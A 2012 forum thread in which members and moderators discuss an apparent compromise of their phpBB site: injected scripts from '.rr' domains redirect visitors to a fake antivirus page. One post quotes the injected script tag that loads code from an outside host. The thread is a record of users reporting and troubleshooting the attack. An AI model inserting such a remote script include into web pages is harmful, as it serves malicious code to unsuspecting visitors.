Forum hacked?

Talk with the staff. Website comments, suggestions, generous donations.

Moderators: Michele, Eric

chigaijin
Warm Stranger
Posts: 61
Joined: Sat Nov 29, 2008 9:26 am
Location: San Francisco
Contact:

Forum hacked?

Postby chigaijin » Wed Mar 28, 2012 8:34 am

Scripts from various .rr domains are being included at the end of every page. Some of them cause redirects on load. (Check out the page source.)

Not sure exactly how it's working, but probably worth checking out and hopefully patching up?

Steve
Hot Stranger
Posts: 213
Joined: Sat Apr 12, 2003 3:04 pm
Location: E Flat Rock, NC
Contact:

Postby Steve » Wed Mar 28, 2012 1:38 pm

Maybe it's already fixed, but I pulled up several forum pages' source (including this one) and didn't see any .rr - scripts or otherwise.

Michele
Strange
Posts: 870
Joined: Sun Apr 27, 2003 1:11 am
Location: Exit 47

Postby Michele » Wed Mar 28, 2012 5:48 pm

I don't see anything, but something seems to be going on or going around. There was another report of antivirus software saying the site is unsafe...

littlepieceofyoursong
Warm Stranger
Posts: 59
Joined: Fri Oct 01, 2004 12:36 pm
Location: Atlanta, GA

Postby littlepieceofyoursong » Wed Mar 28, 2012 6:20 pm

I've gotten several redirects trying to access the forum recently, though not in the last few days. I was going to scan my computer to make sure it wasn't something in my system causing it before I said anything here. Other folks having run into it makes me think there's something weird, though.

cmooreNC
Tengster
Posts: 850
Joined: Wed Oct 13, 2004 9:59 pm
Location: Hermitage, TN

Same problem for me...

Postby cmooreNC » Fri Mar 30, 2012 1:38 pm

Yeah, I've had repeated redirects to a supposed anti-virus scanning page when I've attempted to access these boards lately. Definitely only this site, but I'm wondering if I haven't somehow got a crummy cookie downloaded that triggers only when I attempt to come here? Blah!
:x
Chris

Michele
Strange
Posts: 870
Joined: Sun Apr 27, 2003 1:11 am
Location: Exit 47

Postby Michele » Fri Mar 30, 2012 6:49 pm

I still haven't seen this at all, but did find a recent article about WordPress blogs getting infected. I've asked Eric to take a look. Thanks for letting us know!

Michele
Strange
Posts: 870
Joined: Sun Apr 27, 2003 1:11 am
Location: Exit 47

Postby Michele » Fri Mar 30, 2012 9:49 pm

Eric has gotten rid of the bad stuff, but let us know if you guys still see redirects or other weirdness, just in case he missed something.

chigaijin
Warm Stranger
Posts: 61
Joined: Sat Nov 29, 2008 9:26 am
Location: San Francisco
Contact:

Postby chigaijin » Sat Mar 31, 2012 6:21 am

Still here today (or back again). Scroll to the bottom of the generated source on the forum home page. :-(

Steve
Hot Stranger
Posts: 213
Joined: Sat Apr 12, 2003 3:04 pm
Location: E Flat Rock, NC
Contact:

Postby Steve » Sat Mar 31, 2012 1:56 pm

chigaijin wrote:Still here today (or back again). Scroll to the bottom of the generated source on the forum home page. :-(

I wonder if it might be something in your computer that is affecting generated source. A virus or installed program that does something you're not expecting?

On the forum home page generated source, I find no ".rr" anywhere on the page. The only script on the page is the privmsg one at the top. At the bottom all I show is: the phpBB copyright division with their notice and link, the closing "bodyline" cell tag, the related closing row tag, the related closing table tag, the closing body tag and the closing html tag.

(On this topic page there are additional scripts for sending private messages, but no others.)

cmooreNC
Tengster
Posts: 850
Joined: Wed Oct 13, 2004 9:59 pm
Location: Hermitage, TN

Seems to be okay for me, today....

Postby cmooreNC » Sat Mar 31, 2012 10:37 pm

Thought I'd check back in. No problem for me today.

Thanks for the "clean up" work! :D
Chris

littlepieceofyoursong
Warm Stranger
Posts: 59
Joined: Fri Oct 01, 2004 12:36 pm
Location: Atlanta, GA

Postby littlepieceofyoursong » Mon Apr 02, 2012 1:36 pm

Got redirected again this morning, so I check the page source, and this script is what's at the bottom:

<script src="http://penden19tagess.rr.nu/nl.php?p=d"

Fred
Tengster
Posts: 767
Joined: Sat Jul 05, 2008 1:55 am
Location: NY metro area

Postby Fred » Tue Apr 03, 2012 5:21 pm

I just got re-directed at sign-in. Actually, this has been going on for a while. I didn't realize what it was; the isp I'm using here gave me an error message. On my second try it worked.
Ain't praying for miracles, I'm just down on my knees
Listening for the song behind everything I think I know
And everything I think I know is just static on the radio.

Fred
Tengster
Posts: 767
Joined: Sat Jul 05, 2008 1:55 am
Location: NY metro area

Postby Fred » Fri Apr 06, 2012 2:53 pm

Still getting re-directs at log-in on the first attempt. Making me very reluctant to use the forum at all.
Ain't praying for miracles, I'm just down on my knees
Listening for the song behind everything I think I know
And everything I think I know is just static on the radio.

Steve
Hot Stranger
Posts: 213
Joined: Sat Apr 12, 2003 3:04 pm
Location: E Flat Rock, NC
Contact:

Postby Steve » Fri Apr 06, 2012 8:43 pm

Maybe you could use the "please keep me signed in" option, however it's worded. At least then you'd avoid that screen.

I did try logging out and back in, though, and still have never had the problem. (Using Chrome with AdBlock Plus on Windows 7 Pro.)

cmooreNC
Tengster
Posts: 850
Joined: Wed Oct 13, 2004 9:59 pm
Location: Hermitage, TN

I use that option ("keep me signed in")...

Postby cmooreNC » Mon Apr 09, 2012 2:40 am

... all the time and it's still happening to me. Only the first time I come to the forum page, though.

Using IE, so that may be my primary problem.
Chris


Return to “VT.com Machine Room”

Who is online

Users browsing this forum: No registered users and 1 guest